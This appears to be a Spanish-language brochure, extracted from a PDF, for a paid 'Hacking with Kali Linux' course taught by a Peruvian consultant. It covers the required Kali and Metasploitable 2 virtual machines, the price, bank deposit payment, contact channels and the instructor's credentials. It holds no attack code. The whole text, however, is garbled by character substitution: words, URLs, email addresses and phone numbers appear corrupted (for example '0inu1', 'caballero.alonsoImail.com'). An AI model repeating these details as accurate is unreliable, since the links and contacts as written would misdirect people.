Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
;1plotar el &b"etivo
=tacar <ontrase@as
". #aterial:
3odos los participantes al <urso de Aackin con /ali 0inu1: recibirn una 6u5a de ;"ercicios de B(
pinas en !ormato P9C con toda la in!ormacin y las prcticas desarrolladas en <urso. =dems de los
links para descarar los videos del <urso.
;l participante deber tener instaladas y con!iuradas las siuientes mquinas virtuales: para desarrollar
el <urso.
#quina virtual de /ali 0inu1 '...,
0ink de 9escara: http://www.kali.or/downloads/
7ombre del =rchivo: kali%linu1%'..%i+*)%nome%vm.tar.4
#etasploitable 2.
0ink de 9escara: http://source!ore.net/pro"ects/metasploitable/!iles/#etasploitable2/
7ombre del =rchivo: metasploitable%linu1%2.....4ip
$%& Di el participante lo requiere se le puede enviar un 9?9 con las mquinas virtuales: a@adiendo D/.
2. Doles por el concepto de astos de env5o a cualquier luar del PerE.
'. ()a y *orario:
0a duracin total del <urso es de ) FseisG horas. ;l <urso se dictar en los siuientes d5as y horarios.
;ste <urso est disponible en ?ideo. ;scribirme un e%mail.
;%mail: reydes@gmail.com
$%& 7o habr reproramaciones. ;l <urso se dictar sin ninEn requisito m5nimo de participantes.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
+. ,nversin y -orma de Pago:
;l <urso tiene un costo de:
D/. -. Doles
;l pao del <urso se reali4a mediante un depsito bancario en la siuiente cuenta:
Dcotia2ank
<uenta de =horros en Doles: +2,%...+'),
= nombre de: =lonso ;duardo <aballero Hue4ada
8na ve4 reali4ado el depsito enviar por !avor el voucher escaneado o sencillamente detallar los datos
al siuiente correo: caballero.alonsoImail.com
$%& Di el participante requiere el 9?9 con las mquinas virtuales: considerar un costo adicional de D/.
2. Doles: por concepto de astos de env5o a cualquier luar del PerE.
<on!irmado el depsito se enviar al correo electrnico del participante: los datos necesarios para
conectarse al Distema y poder participar en el <urso.
.. #s ,n/ormacin:
Di desea mayor in!ormacin sobre el <urso de Aackin con /ali 0inu1: tiene a su disposicin los
siuientes mecanismos de contacto:
<orreo electrnico: caballero.alonsoImail.com
3witter: https://twitter.com/=lonsoJKeL9eD
0inked>n: http://pe.linkedin.com/in/alonsocaballeroque4ada/
?5a Meb: http://www.reydes.com
Dkype: KeL9eDImail.com
<elular: (,(+.,.+.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
0. 1obre el ,nstructor:
=lonso ;duardo <aballero Hue4ada es 2rainbench <erti!ied 7etwork Decurity: <omputer Corensics
F8.D.G N 0inu1 =dministration F6eneralG: <7A;: <7<C: <7A=M: 6>=< DDP%<7D= y #iembro de
&pen Meb =pplication Decurity Pro"ect F&M=DPG. <uenta con ms de once a@os de e1periencia en el
rea y desde hace seis a@os labora como <onsultor e >nstructor >ndependiente en las reas de Aackin
Otico N <mputo !orense. Perteneci por muchos a@os al rupo internacional de Deuridad Kare6aP4
e intera actualmente el 6rupo Peruano de Deuridad PeruD;<. Aa dictado cursos en PerE y ;cuador:
presentndose tambiQn constantemente en e1posiciones en!ocadas a: Aackin Otico: <mputo Corense:
678/0inu1 y Do!tware 0ibre. Du correo electrnico es KeL9eDImail.com y su pina personal est
en: http://www.KeL9eD.com
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS